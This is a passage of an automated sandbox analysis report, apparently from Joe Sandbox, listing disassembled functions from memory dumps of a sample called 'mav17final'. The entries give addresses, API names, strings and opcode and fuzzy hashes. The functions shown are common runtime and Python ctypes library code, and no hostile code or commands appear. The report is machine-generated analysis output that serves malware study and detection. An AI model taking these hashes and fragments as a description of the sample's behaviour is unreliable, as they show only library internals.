                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA244157
                                                  • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF8BA244167
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                  • String ID: csm$csm
                                                  • API String ID: 4108983575-3733052814
                                                  • Opcode ID: d96c539858820a31a9c1340fe1861477bc26c032fcc487563b75466d3052f7d1
                                                  • Instruction ID: 2a4c82e154c53a732dc0b4a88c60755b5119c69a788689a496f71e65bf8d4648
                                                  • Opcode Fuzzy Hash: d96c539858820a31a9c1340fe1861477bc26c032fcc487563b75466d3052f7d1
                                                  • Instruction Fuzzy Hash: F4516B369086838BEF648B19945426876A0FB95FD9F1482B6DF9C47B95CF3CE460EB00
                                                  Function 00007FF8BA24F050 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind
                                                  • String ID: csm$f
                                                  • API String ID: 451473138-629598281
                                                  • Opcode ID: 94627d9c7195f9c36ee16ac86650ab8a4e652cd15aa300a0b5f08846187e0d97
                                                  • Instruction ID: 1114db755bc37b8e0267fe36605ed7157ca1bb73eb2c1e32dd4b148571c1976a
                                                  • Opcode Fuzzy Hash: 94627d9c7195f9c36ee16ac86650ab8a4e652cd15aa300a0b5f08846187e0d97
                                                  • Instruction Fuzzy Hash: 2151CF36A096038AEB14CF19E844A6937A5FB84FC8F1181B1DF1E47788DF79E945E700
                                                  Function 00007FF8BA24AAD8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: NameName::
                                                  • String ID: %lf
                                                  • API String ID: 1333004437-2891890143
                                                  • Opcode ID: ce39b8ddb33b1742c1c733f8d1258caa8bc8f3cdabe38b30e72aebe8897d44a3
                                                  • Instruction ID: 787042ffa3c2d194841d402d6ce29eb4f43f7115b2df6121b0a852d30c74507c
                                                  • Opcode Fuzzy Hash: ce39b8ddb33b1742c1c733f8d1258caa8bc8f3cdabe38b30e72aebe8897d44a3
                                                  • Instruction Fuzzy Hash: A6318021A0CA8785FA11DB2AE9510B9B3A1BF59FC0F4882B6EF5E47791DF3CE1059700
                                                  Function 00007FF8B9F61904 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Object_$Err_InstanceStringSubclass
                                                  • String ID: abstract class
                                                  • API String ID: 1122563627-1623945838
                                                  • Opcode ID: 6c7db8fb0eb44c7424908bf4032845ff0e9bfd72eafbca4c076b0be6399d20a6
                                                  • Instruction ID: 892e40e1b204777bb6f18dd536cd06262711d11435ec08cd6f84d9d3a902f081
                                                  • Opcode Fuzzy Hash: 6c7db8fb0eb44c7424908bf4032845ff0e9bfd72eafbca4c076b0be6399d20a6
                                                  • Instruction Fuzzy Hash: 8D211A60B0CBC782FA509F6EE8500792764AF86BE6F18B531DB0E563A6DE6CE455C300
                                                  Function 00007FF8B9F6A8D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocErr_Stringmemcpy
                                                  • String ID: abstract class
                                                  • API String ID: 4155950771-1623945838
                                                  • Opcode ID: 39caa09f7d9a9fa5dd63c26db85cad3ebfb1af8ff0279c48b353af220d1a1222
                                                  • Instruction ID: 5788d4e464e31a3bfc39fdc32dda9fa6aac53d8f7837e4ee086590413fb9ebd3
                                                  • Opcode Fuzzy Hash: 39caa09f7d9a9fa5dd63c26db85cad3ebfb1af8ff0279c48b353af220d1a1222
                                                  • Instruction Fuzzy Hash: FE217832A19B8182EB548F2AE84016973A4FB8AFE5F2A6135DF4D07758CF3CE461C340
                                                  Function 00007FF8B9078FF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Service$CloseControlHandle
                                                  • String ID: ControlService
                                                  • API String ID: 3384881392-253159669
                                                  • Opcode ID: 9db97aeadb2ef5c283a3316fb4a48aa353463d3e294c4c51911b327c708cc174
                                                  • Instruction ID: c1eddd2e624e26be99e69631d8929f9c5132892b5c64ee10bdbcf4b85662d670
                                                  • Opcode Fuzzy Hash: 9db97aeadb2ef5c283a3316fb4a48aa353463d3e294c4c51911b327c708cc174
                                                  • Instruction Fuzzy Hash: 1721F121B1CBC682EE509F29A85527977A1FFA9BE0F440035DB4D43B55EE3CE1078740
                                                  Function 00007FF8B9074179 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$QueryVirtual
                                                  • String ID: (KsOI)$xrw
                                                  • API String ID: 3966390079-822595024
                                                  • Opcode ID: f2e8e81b5692cf2329b007ce33bbd7a4970240b0eeb7c7e7c94e4f335722289f
                                                  • Instruction ID: ad9fba8a4c145bdbeb87aaa254c2a1c31ea4a53d8f808b112880d6391e7036bf
                                                  • Opcode Fuzzy Hash: f2e8e81b5692cf2329b007ce33bbd7a4970240b0eeb7c7e7c94e4f335722289f
                                                  • Instruction Fuzzy Hash: 8C111C25A0DAC681EE649F6AA8543797761BF64BE5F444031CF4E47754EE3CE0178700
                                                  Function 00007FF8B9074182 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$QueryVirtual
                                                  • String ID: (KsOI)$xwc
                                                  • API String ID: 3966390079-1454042600
                                                  • Opcode ID: 021ddd8d92928ce44b5d51787a319246aa52be3e86ce24aaf570718d96fea167
                                                  • Instruction ID: 45dc86909514b35ba75d6d820a50f3e347f602409f8e6d1c349659acf07b4f93
                                                  • Opcode Fuzzy Hash: 021ddd8d92928ce44b5d51787a319246aa52be3e86ce24aaf570718d96fea167
                                                  • Instruction Fuzzy Hash: CE111C25A0DAC685EE649F6AA8543797761BF64BE5F444031CF4E47754EE3CE0178700
                                                  Function 00007FF8B9F6402C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF8B9F63A00: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8B9F63A4B
                                                  • PyUnicode_FromStringAndSize.PYTHON311 ref: 00007FF8B9F64090
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: FromSizeStringUnicode___stdio_common_vsprintf
                                                  • String ID: :%x$ctypes object structure too deep
                                                  • API String ID: 1484205955-3091822184
                                                  • Opcode ID: 2459c21495d6783b8173aaa301187f361a2d8e91fe46e9680da2c72f9c63c0db
                                                  • Instruction ID: b1d17c1c618baeab2717fb3c73f5a25f0dfc91bb6627b3445d4d3ba5f566185a
                                                  • Opcode Fuzzy Hash: 2459c21495d6783b8173aaa301187f361a2d8e91fe46e9680da2c72f9c63c0db
                                                  • Instruction Fuzzy Hash: 52212C32B18BC691EA20CF19E4502AA67A0FB887E5F845135DB8E47765DF3CE645CB40
                                                  Function 00007FF8B9F6A840 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AuditErr_StringSys_
                                                  • String ID: abstract class$ctypes.cdata
                                                  • API String ID: 1384585920-3531133667
                                                  • Opcode ID: 9146581257e5cd249a8ce15bd5017c0ced05df42edf8eab21e35891fecd2194b
                                                  • Instruction ID: ed408948b1cbc0b5cc477362cb03871f2ae2e91653de531e952a9c11e6a53365
                                                  • Opcode Fuzzy Hash: 9146581257e5cd249a8ce15bd5017c0ced05df42edf8eab21e35891fecd2194b
                                                  • Instruction Fuzzy Hash: 6D010921B19B8281EB858F2AE8901797BA0FF88BE6F499435DB4D97764DF2CD155C300
                                                  Function 00007FF8B9F63E98 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • bytes or integer address expected instead of %s instance, xrefs: 00007FF8B9F68AEB
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Long$Bytes_Long_MaskStringUnsigned
                                                  • String ID: bytes or integer address expected instead of %s instance
                                                  • API String ID: 3464282214-706233300
                                                  • Opcode ID: c48ceac9eea2b1fa827f2cbb00a6abdd9340ea2753a13b5f87d6d5264b647cc5
                                                  • Instruction ID: edffa2b1c30c78594543c294e21d8fec2a38e5efde2d57eaf8c27a711a48dc6a
                                                  • Opcode Fuzzy Hash: c48ceac9eea2b1fa827f2cbb00a6abdd9340ea2753a13b5f87d6d5264b647cc5
                                                  • Instruction Fuzzy Hash: 6B012976A09F8682EB409F1DE8502382770BF59BEAF54A532CB4E47310CE7CE495C300
                                                  Function 00007FF8B9F64F04 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_LongLong_MaskStringUnicode_Unsigned
                                                  • String ID: function name must be string, bytes object or integer
                                                  • API String ID: 2115587880-3177123413
                                                  • Opcode ID: 81ea3209a1b354214586730592f4c670ad1da60d41d4e62eb4eacb33d520f56b
                                                  • Instruction ID: 108042ec6becd1b2795ad8170321ef71fd5ef63a055e5754077cc018d31b68b2
                                                  • Opcode Fuzzy Hash: 81ea3209a1b354214586730592f4c670ad1da60d41d4e62eb4eacb33d520f56b
                                                  • Instruction Fuzzy Hash: F801A922F29B8681FB655F6ED8545782291EF49BE6F149030C74D877A1DE3C5495C300
                                                  Function 00007FF8B9F6DD4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AuditDeallocFromLongLong_Sys_
                                                  • String ID: ctypes.get_errno
                                                  • API String ID: 2276389247-2892954555
                                                  • Opcode ID: c6ace954750aef6584acdef0dbafe0f2db3ad2dcd629e74672a8309c43f57945
                                                  • Instruction ID: f39c2436afebe1381fd0534441913cf41019ebf159e8e3f963105f558480ad81
                                                  • Opcode Fuzzy Hash: c6ace954750aef6584acdef0dbafe0f2db3ad2dcd629e74672a8309c43f57945
                                                  • Instruction Fuzzy Hash: 18F0A921F19BC2C1EA449F2AED4457966A1EF85BE6F482034DB4E43754DF3CE580D700
                                                  Function 00007FF8B9F6DDCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AuditDeallocFromLongLong_Sys_
                                                  • String ID: ctypes.get_last_error
                                                  • API String ID: 2276389247-1232113872
                                                  • Opcode ID: 853979658a44e765c27009c70b8a62aa63505b1bac88553f7faa954c15010c56
                                                  • Instruction ID: 2dca03efcb226a62503ba3d8b0ce75bb243a40b378c09507b32c69cec83633a3
                                                  • Opcode Fuzzy Hash: 853979658a44e765c27009c70b8a62aa63505b1bac88553f7faa954c15010c56
                                                  • Instruction Fuzzy Hash: 61F08661B19BC281EA44AF2AED5417866A1EF95BE6F481034DB0E42754DE2CE580D700
                                                  Function 00007FF8B9078140 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastOpenProcess
                                                  • String ID: OpenProcess$automatically set for PID 0
                                                  • API String ID: 919517065-2746090705
                                                  • Opcode ID: 7c35501a303b2777f004bc09f587717ea65ef8e0d80bfceead6ee05c0336e9e1
                                                  • Instruction ID: a523a5ab62dacb10ac720b3415f40dde56d5bff3398fc4406a8c18cc43d58b50
                                                  • Opcode Fuzzy Hash: 7c35501a303b2777f004bc09f587717ea65ef8e0d80bfceead6ee05c0336e9e1
                                                  • Instruction Fuzzy Hash: E3F04F11F195C682EF698F6A689803956D5AFA87F4F441034DB0E86794EE1CE8978700
                                                  Function 00007FF8B9F6D9D4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_AuditCallObject_ParseSys_Tuplememset
                                                  • String ID: O&O!$ctypes.call_function
                                                  • API String ID: 886791329-313584727
                                                  • Opcode ID: 17adec98670e9f6cdebf84fa662457cca95efbc4de64805adf32e68e07ce2538
                                                  • Instruction ID: 1e0a1141133c6a50f72e6f2b33db6c7f660d25812d5358d4d5346ec38992bc03
                                                  • Opcode Fuzzy Hash: 17adec98670e9f6cdebf84fa662457cca95efbc4de64805adf32e68e07ce2538
                                                  • Instruction Fuzzy Hash: FF013972A18B8792EB508F15E8847AA67A4FB487E5F401136DA4D43724DF7CE145D710
                                                  Function 00007FF8B9F6DA68 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_AuditCallObject_ParseSys_Tuplememset
                                                  • String ID: O&O!$ctypes.call_function
                                                  • API String ID: 886791329-313584727
                                                  • Opcode ID: 956f25cfe963604cb9d4e30e000f0088442d622793c0436951a4906829bed983
                                                  • Instruction ID: 599dd2d3dfa26e61f875f645cbf8e09c3fb24fb98a1a5bfeefde87ce13a0c665
                                                  • Opcode Fuzzy Hash: 956f25cfe963604cb9d4e30e000f0088442d622793c0436951a4906829bed983
                                                  • Instruction Fuzzy Hash: A3011B72A1CF8792E7508F19E8847A967A4FB487E6F401136EA4C47764DF7CE145C710
                                                  Function 00007FF8B9F62F60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocErr_String
                                                  • String ID: _type_ must be a type$_type_ must have storage info
                                                  • API String ID: 1259552197-214983684
                                                  • Opcode ID: f9c93959e9af95d6c9b4c14054f54ac853c0c588ad50044a4a2a3fec31618313
                                                  • Instruction ID: 248004d11a629550a86b7866b16a88fbace45ebb405318a0bddb0ccc721550d5
                                                  • Opcode Fuzzy Hash: f9c93959e9af95d6c9b4c14054f54ac853c0c588ad50044a4a2a3fec31618313
                                                  • Instruction Fuzzy Hash: E301FBB5F19B8285EE549F2DD4402B822A0AF4ABF2F54A131DB0D923A5DF7CA484C301
                                                  Function 00007FF8B9F6E7AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_String
                                                  • String ID: cannot be converted to pointer
                                                  • API String ID: 1450464846-3065012988
                                                  • Opcode ID: ba69f6be1e03f64db6319ffa1c479f40c92e1bf7f208d3a0c57e532b4c3c8d90
